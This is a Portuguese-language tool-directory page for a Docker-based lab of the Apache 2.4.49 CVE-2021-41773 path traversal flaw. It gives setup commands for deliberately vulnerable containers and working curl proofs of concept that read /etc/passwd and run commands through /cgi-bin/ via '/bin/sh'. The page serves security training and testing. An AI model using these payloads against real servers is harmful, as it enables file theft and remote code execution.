Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mightysai1997/cve-2021-41773s
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubmightysai1997/cve-2021-41773s

CVE-2021-41773S

Laboratório vulnerável baseado em Docker para CVE-2021-41773 path traversal do Apache, fornecendo configurações de PoC para leitura de arquivos e execução remota de código em ambiente controlado.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
12há 9 mesesAinda não revisado

Imagens Docker vulneráveis para o CVE-2021-41773 path traversal do Apache

Esta vulnerabilidade apenas se aplica à versão 2.4.49 que possui configurações específicas não padrão. Em certas situações, isso pode resultar em leitura de arquivos ou execução de código.

tweet https://twitter.com/ptswarm/status/1445376079548624899

Configuração vulnerável para leitura de arquivos

Os contêineres podem ser baixados diretamente do Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:no-cgid

e executados usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Os logs do Apache podem ser visualizados usando o comando abaixo, ou basta remover o "-dit" do comando run acima para transmitir o stdio docker logs <container-id>

PoC para leitura de arquivos

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Configuração vulnerável a RCE

Os contêineres podem ser baixados diretamente do Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:with-cgid

e executados usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Os logs do Apache podem ser visualizados usando o comando abaixo, ou basta remover o "-dit" do comando run acima para transmitir o stdio docker logs <container-id>

PoC para RCE

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

Construir contêineres Docker personalizados

Modifique e construa suas próprias versões usando o dockerfile e os arquivos de modelo httpd.conf nos subdiretórios

  • Use ./no-cgi para a configuração vulnerável à leitura de arquivos
  • Use ./with-cgi para a configuração vulnerável à execução de código
Baixar ferramenta